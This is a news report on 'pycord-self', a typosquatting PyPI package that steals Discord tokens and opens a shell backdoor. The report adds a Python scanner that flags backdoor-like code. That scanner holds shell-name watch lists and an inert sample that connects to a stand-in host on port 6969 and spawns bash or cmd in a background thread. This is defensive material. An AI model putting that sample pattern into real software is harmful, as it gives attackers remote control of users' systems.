Category: IT|Jan 18, 2025 | Author: Admin

Malicious PyPI package steals Discord auth tokens from devs

A malicious package named 'pycord-self' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system.

The package mimics the highly popular 'discord.py-self,' which has nearly 28 million downloads, and even offers the functionality of the legitimate project.

 

The official package is a Python library that allows communication with Discord's user API and permits developers to control accounts programmatically.

 

It is typically used for messaging and automating interactions, creating Discord bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.

 

According to code security company Socket, the malicious package was added to PyPI last year in June and has been downloaded 885 times so far.

 

At the time of writing, the package is still available on PyPI from a publisher that had its details verified by the platform.

 

Token theft and persistent access


Socket researchers analyzed the malicious package and found that pycord-self contains code that performs two main things. One is stealing Discord authentication tokens from the victim and sending them to an external URL.

 

Attackers can use the stolen token to hijack the developer's Discord account without needing the access credentials, even if two-factor authentication protection is active.

 

The second function of the malicious package is to set up a stealthy backdoor mechanism by creating a persistent connection to a remote server through port 6969.

 

"Depending on the operating system, it launches a shell ("bash" on Linux or "cmd" on Windows) that grants the attacker continuous access to the victim's system," explains Socket in the report.

 

"The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional."

 

Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially when the package is a popular one. Verifying the name of the package can also lower the risk of falling victim to typosquatting.

 

When working with open-source libraries, it is advisable to review the code for suspicious functions, if possible, and avoid anything that appears obfuscated. Additionally, scanning tools may help with detecting and blocking malicious packages.
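One way to do a first-pass review of unpacked package source for the traits described above (a network socket, a spawned shell, a background thread) is a static scan that parses the code without running it. This is an added example, not Socket's tooling or code from the original article; the function names, the watch lists and both samples are constructed assumptions, and a hit only marks a file for manual reading.

```python
import ast
from pathlib import Path

SHELLS = {"bash", "sh", "cmd", "cmd.exe", "powershell"}  # assumed watch list
EXEC_MODULES = {"subprocess", "pty"}                      # assumed watch list

def audit_source(source: str) -> dict:
    """Collect backdoor-like traits from one module without executing it."""
    imports, shells, threaded = set(), set(), False
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imports.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower() in SHELLS:
                shells.add(node.value.lower())
        elif isinstance(node, ast.Call):
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
            threaded = threaded or name == "Thread"
    found = {"network": "socket" in imports,
             "process_exec": bool(imports & EXEC_MODULES),
             "shell_names": sorted(shells),
             "background_thread": threaded}
    # Socket + process spawning + a shell name in one module warrants a manual read.
    found["review"] = found["network"] and found["process_exec"] and bool(shells)
    return found

def audit_tree(root) -> dict:
    """Audit every .py file under an unpacked package; return files to review."""
    hits = {}
    for path in Path(root).rglob("*.py"):
        try:
            result = audit_source(path.read_text(encoding="utf-8", errors="replace"))
        except (SyntaxError, ValueError):
            continue  # not parseable as Python 3; inspect by hand
        if result["review"]:
            hits[str(path)] = result
    return hits

# Constructed, inert sample: never executed, only parsed.
SUSPICIOUS = '''
import socket, subprocess, threading, platform
def _worker():
    conn = socket.create_connection(("host.invalid", 6969))
    shell = "bash" if platform.system() == "Linux" else "cmd"
    subprocess.Popen([shell])
threading.Thread(target=_worker, daemon=True).start()
'''
BENIGN = "import socket\ndef resolve(h):\n    return socket.gethostbyname(h)\n"
```

Obfuscated code can hide these traits from a plain syntax-tree scan, which is why the advice to avoid anything that appears obfuscated still applies.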
